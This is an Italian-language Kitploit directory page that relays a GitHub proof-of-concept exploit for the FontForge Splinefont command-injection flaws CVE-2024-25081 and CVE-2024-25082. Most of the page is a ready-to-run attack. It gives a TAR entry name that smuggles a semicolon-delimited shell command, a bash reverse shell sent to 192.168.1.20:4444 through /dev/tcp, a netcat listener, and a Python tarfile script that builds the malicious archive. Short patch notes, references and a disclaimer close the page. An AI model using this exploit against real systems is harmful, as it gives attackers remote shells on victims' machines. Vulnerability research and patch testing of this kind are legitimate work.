Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25082_CVE-2024-25081 — Vulnerabilità di iniezione di comandi tramite nome file appositamente creato in FontForge Splinefont | Kitploit
Strumenti/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlApprendimento e Formazione
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

Vulnerabilità di iniezione di comandi tramite nome file appositamente creato in FontForge Splinefont

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
15 mesi faNon ancora revisionato

⚠️ FontForge RCE — CVE-2024-25081 e CVE-2024-25082 - PoC

📖 Panoramica

Exploit proof-of-concept per due vulnerabilità di command injection in FontForge ≤ 20230101 (componente Splinefont).

CVEVectorTrigger
CVE-2024-25081Nome file modificatoApertura diretta del file
CVE-2024-25082Nome file di archivio modificatoEstrazione TAR/ZIP/GZ/BZ2

Questo PoC ha come target CVE-2024-25082 — L'estrazione automatica degli archivi di FontForge passa i nomi dei file a una shell senza sanificazione, consentendo a un payload delimitato da punto e virgola incorporato nel nome di una voce TAR di eseguire comandi arbitrari.


Come funziona

FontForge supporta l'apertura di file di font direttamente dagli archivi. Quando estrae un archivio TAR, il componente Splinefont costruisce un comando shell utilizzando il nome del file dalla voce dell'archivio. Poiché il nome del file non è sanificato, un punto e virgola (;) nel nome della voce esce dal comando previsto e inietta istruzioni shell arbitrarie.

Nome voce TAR dannoso:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Quando FontForge elabora questo archivio, la shell interpreta:

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

Ambiente

  • Software vulnerabile: FontForge ≤ 20230101
  • Piattaforma: Linux
  • Listener dell'attaccante: 192.168.1.20:4444 (modificare secondo necessità)

📋 Prerequisiti

  • Python 3 (solo libreria standard, modulo tarfile)
  • netcat sulla macchina dell'attaccante
  • FontForge ≤ 20230101 sulla macchina target

🛠️ Prova di concetto

1. Avvia un listener netcat sulla macchina dell'attaccante

root@kitploit:~
nc -lvnp 4444

2. Genera l'archivio TAR dannoso

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Apri l'archivio in FontForge sul target

root@kitploit:~
fontforge exploit.tar

Una reverse shell si collegherà al tuo listener.


🔒 Patch

Corretto in FontForge post-20230101 tramite PR #5367. Aggiorna all'ultima versione.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • Build manuale: preleva l'ultima versione da fontforge/fontforge

🔍 Riferimenti

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • Correzione FontForge PR #5367

⚖️ Disclaimer e termini

Questo codice Proof of Concept (PoC) è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati.

  • Nessun permesso è concesso per modificare, ridistribuire o utilizzare questo codice per altri scopi.
  • L'uso o la modifica non autorizzati possono essere illegali e non etici.
  • Gli autori non si assumono alcuna responsabilità per qualsiasi uso improprio o danno.
Scarica lo strumento